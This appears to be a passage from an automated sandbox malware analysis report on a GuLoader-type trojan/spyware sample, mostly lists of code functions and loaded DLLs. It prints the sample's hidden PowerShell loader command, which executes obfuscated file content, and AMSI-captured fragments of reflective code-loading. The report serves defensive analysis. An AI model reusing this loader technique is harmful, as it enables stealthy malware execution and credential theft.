            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22831C606_2_22831C60
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22836A706_2_22836A70
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228351806_2_22835180
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22831F806_2_22831F80
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22836DA06_2_22836DA0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22833BA06_2_22833BA0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228309A06_2_228309A0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228357C06_2_228357C0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228325C06_2_228325C0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228341E06_2_228341E0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22830FE06_2_22830FE0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228345006_2_22834500
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228313006_2_22831300
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228361206_2_22836120
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22832F206_2_22832F20
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22834B406_2_22834B40
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228319406_2_22831940
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228367506_2_22836750
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228367606_2_22836760
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228335606_2_22833560
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228303606_2_22830360
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22841CF06_2_22841CF0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228484706_2_22848470
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284FB306_2_2284FB30
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22840E8B6_2_22840E8B
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284A0906_2_2284A090
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284D2906_2_2284D290
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22840E986_2_22840E98
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284BCB06_2_2284BCB0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22848AB06_2_22848AB0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284EEB06_2_2284EEB0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284D8D06_2_2284D8D0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284A6D06_2_2284A6D0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22841CE06_2_22841CE0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284F4F06_2_2284F4F0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228490F06_2_228490F0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284C2F06_2_2284C2F0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228404FB6_2_228404FB
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228400076_2_22840007
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228418176_2_22841817
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284C6106_2_2284C610
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228494106_2_22849410
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284F8106_2_2284F810
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228418286_2_22841828
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284B0306_2_2284B030
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284E2306_2_2284E230
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228400406_2_22840040
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22849A506_2_22849A50
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284CC506_2_2284CC50
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284E8706_2_2284E870
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284B6706_2_2284B670
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284B9906_2_2284B990
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228487906_2_22848790
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284EB906_2_2284EB90
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284D5B06_2_2284D5B0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284A3B06_2_2284A3B0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228409BF6_2_228409BF
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284F1D06_2_2284F1D0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228409D06_2_228409D0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22848DD06_2_22848DD0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284BFD06_2_2284BFD0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284DBF06_2_2284DBF0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284A9F06_2_2284A9F0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228405086_2_22840508
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284AD106_2_2284AD10
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284DF106_2_2284DF10
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284C9306_2_2284C930
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228497306_2_22849730
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284E5506_2_2284E550
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284B3506_2_2284B350
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228413516_2_22841351
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228413606_2_22841360
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22849D706_2_22849D70
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284CF706_2_2284CF70
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229326686_2_22932668
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229322546_2_22932254
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229350986_2_22935098
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2293BB906_2_2293BB90
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C22386_2_229C2238
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C29206_2_229C2920
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C0D886_2_229C0D88
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C30086_2_229C3008
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C36F06_2_229C36F0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C14706_2_229C1470
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C1B506_2_229C1B50
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C58206_2_229C5820
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C3FB16_2_229C3FB1
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C22296_2_229C2229
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C00066_2_229C0006
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C00406_2_229C0040
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C0A106_2_229C0A10
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C09EA6_2_229C09EA
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C29116_2_229C2911
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C2FF86_2_229C2FF8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C0D786_2_229C0D78
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C36E16_2_229C36E1
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C14606_2_229C1460
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_229C1B3F6_2_229C1B3F
            Source: fGu8xWoMrg.exeStatic PE information: invalid certificate
            Source: fGu8xWoMrg.exe, 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebiddens lokalsamfund.exe4 vs fGu8xWoMrg.exe
            Source: fGu8xWoMrg.exeBinary or memory string: OriginalFilenamebiddens lokalsamfund.exe4 vs fGu8xWoMrg.exe
            Source: fGu8xWoMrg.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/16@6/6
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,6_2_004034F7
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeCode function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404954
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semitelic.iniJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_03
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeFile created: C:\Users\user\AppData\Local\Temp\nsm8554.tmpJump to behavior
            Source: fGu8xWoMrg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: fGu8xWoMrg.exeVirustotal: Detection: 75%
            Source: fGu8xWoMrg.exeReversingLabs: Detection: 63%
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeFile read: C:\Users\user\Desktop\fGu8xWoMrg.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\fGu8xWoMrg.exe "C:\Users\user\Desktop\fGu8xWoMrg.exe"
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe "C:\Users\user\AppData\Local\Temp\Mangedoblende.exe"
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe "C:\Users\user\AppData\Local\Temp\Mangedoblende.exe"Jump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: fGu8xWoMrg.exeStatic file information: File size 1119496 > 1048576
            Source: fGu8xWoMrg.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2502967073.00000000072FA000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000002.00000002.2521881649.0000000009B31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Spaakoners $Skibsside63 $Covenants), (Impactment @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Unacetic = [AppDomain]::CurrentDomain.GetAssemblies()$glob
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Petiteness)), $Osmanie).DefineDynamicModule($Cologne, $false).DefineType($Forehock, $marcipanmasserne, [System.MulticastDelegate])$Bre
